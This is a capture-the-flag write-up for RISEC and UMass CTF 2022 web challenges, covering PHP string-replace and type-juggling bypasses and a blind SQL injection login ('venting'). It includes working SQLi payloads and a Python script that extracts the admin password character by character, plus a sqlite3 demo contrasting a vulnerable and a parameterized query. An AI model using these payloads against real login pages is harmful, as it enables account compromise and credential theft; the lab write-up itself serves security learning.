RISEC CTF + UMass CTF 2022

Note: A JOURNEY TO GAIN KNOWLEDGE

Web Challenge

RISEC CTF

Pretty Horrible Program 1

  <?php
  if (isset($_GET['bingus'])) {
    $input = $_GET['bingus'];
    $to_replace = 'bingus';
    $clean_string = preg_replace("/$to_replace/", '', $input);
    echo "<p>Your string is: $clean_string</p>";
    if ($clean_string == $to_replace) {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: green;\">IS</span> your beloved</h2>";
      output_flag();
    } else {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: red;\">IS NOT</span> your beloved</h2>";
    }
  }
  ?>
  • Notice that $clean_string is generated by removing every occurrence of 'bingus' from the input with a single, non-recursive preg_replace pass.

  • So we just need an input that, after that one replacement, is equal to 'bingus'.

demo:

Pretty Horrible Program 2

<?php
class User
{
    public $role = 'Admin';
}

$default_user = new User;
$_COOKIE = serialize($default_user);
setcookie(
    'user',
    serialize($default_user)
);
$a = unserialize($_COOKIE);
echo "$_COOKIE";

Pretty Horrible Program 3

  <?php
  if (isset($_GET['input1']) and isset($_GET['input2'])) {
    if ($_GET['input1'] == $_GET['input2']) {
      print '<h3 class="error">Nice try, but it won\'t be that easy ;)</h3>';
    } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) {
      output_flag();
    } else {
      print '<h3 class="error">Your inputs don\'t match</h3>';
    }
  }
  ?>
  <p>See if you can make the sha256 hashes match</p>
  <br />
  <a href="/php3/index.php?source=true">Source Code</a>
  <form method="get">
    <input type="text" required name="input1" placeholder="Input 1" />
    <p>Hash: <?php if (isset($_GET['input1'])) print hash("sha256", $_GET['input1']) ?></p>
    <input type="text" required name="input2" placeholder="Input 2" />
    <p>Hash: <?php if (isset($_GET['input2'])) print hash("sha256", $_GET['input2']) ?></p>
    <input type="submit" />
  </form>
</body>

</html>
<?php

Workflow:

  • Now just put [] in the input names (input1[] and input2[]) so PHP receives two different arrays: the == check fails, but hash() cannot hash an array and returns the same failure value for both, so the === check passes and you get the flag.

UMass CTF

venting

  • When you connect, check the history in Burp Suite: you can find the link that redirects to the login page.

  • Now read the hint: the username is 'admin', and the password field has no filter, which means it may be SQLi. Exactly, it's blind SQLi.

Another way: brute-force it with Python requests:

import requests, string

url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login"
s = requests.session()

passwordRetrieve = ""
# length check used first to find the password length:
# ' or (select 'a' from users where username='admin' and length(Password)>36)='a
# query the backend ends up running (the backslash in the username escapes its closing quote):
# SELECT * from users WHERE username='admin\' AND Password = ''or 'True'

def solve():
    global passwordRetrieve
    index = 1  # SQL substr() is 1-based; position 0 returns '' and never matches
    while True:
        for char in string.printable:
            usernamefield = "\\"  # a single backslash
            passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a"
            postParam = {'user': usernamefield, 'pass': passwordfield}
            response = s.post(url, data=postParam).text
            if "Invalid" not in response:  # login did not fail, so the guessed character is right
                passwordRetrieve += char
                index += 1
                print(passwordRetrieve)
                break
        if index == 37:  # stop once the password length found with the check above is reached
            break

solve()
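As an added example (not code from the write-up or the challenge), here is the venting login simulated locally with sqlite3: the string-built query the challenge must be using next to a parameterized one, with the write-up's substr() oracle run against both. The users table, its column names, the admin password and the 1-based position handling are assumptions constructed for this demo.

```python
import sqlite3
import string

SECRET = "Flag{constructed-sample}"  # constructed stand-in for the admin password

def make_db():
    """In-memory stand-in for the challenge's users table (columns as in the write-up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, Password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", SECRET))
    return db

def login_vulnerable(db, user, password):
    """Query built by string concatenation, as the challenge must do for the write-up's
    payload to work: the password field closes its quote and appends an OR condition.
    The write-up's backslash username relies on MySQL-style escaping, which SQLite
    lacks; the password payload closes the quote on its own, so it is not needed here."""
    sql = f"SELECT * FROM users WHERE username='{user}' AND Password='{password}'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query looks like a failed login ("Invalid")

def login_safe(db, user, password):
    """Same check with bound parameters: the inputs stay data and never become SQL."""
    sql = "SELECT * FROM users WHERE username=? AND Password=?"
    return db.execute(sql, (user, password)).fetchone() is not None

def probe(db, login, pos, ch):
    """The write-up's boolean oracle for one character. SQL substr() is 1-based, so
    pos starts at 1; position 0 returns '' and would never match anything."""
    payload = (f"' or (select 'a' from users where username='admin' "
               f"and substr(Password,{pos},1)='{ch}')='a")
    return login(db, "admin", payload)

def extract(db, login, max_len=40):
    """Rebuild the password one character at a time; stops when no character matches."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in string.printable:
            if probe(db, login, pos, ch):
                out += ch
                break
        else:
            break
    return out
```

Against login_vulnerable the loop recovers SECRET; against login_safe every probe fails and it returns an empty string.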

Notes on Pretty Horrible Program 3: at first, I just tried searching around the keyword "SHA256 collision", but what we got was this one: it takes about ≈3.6×10^13 years to find, so it's not a practical option. After that I focused on '==' in PHP; searching around, I got this and this.

Notes on venting: this challenge ended and the website was turned off, so I built it in Docker from here. I solved this challenge with Burp Suite the same as this lab.

Thanks for reading. Have a good day!

Contact: facebook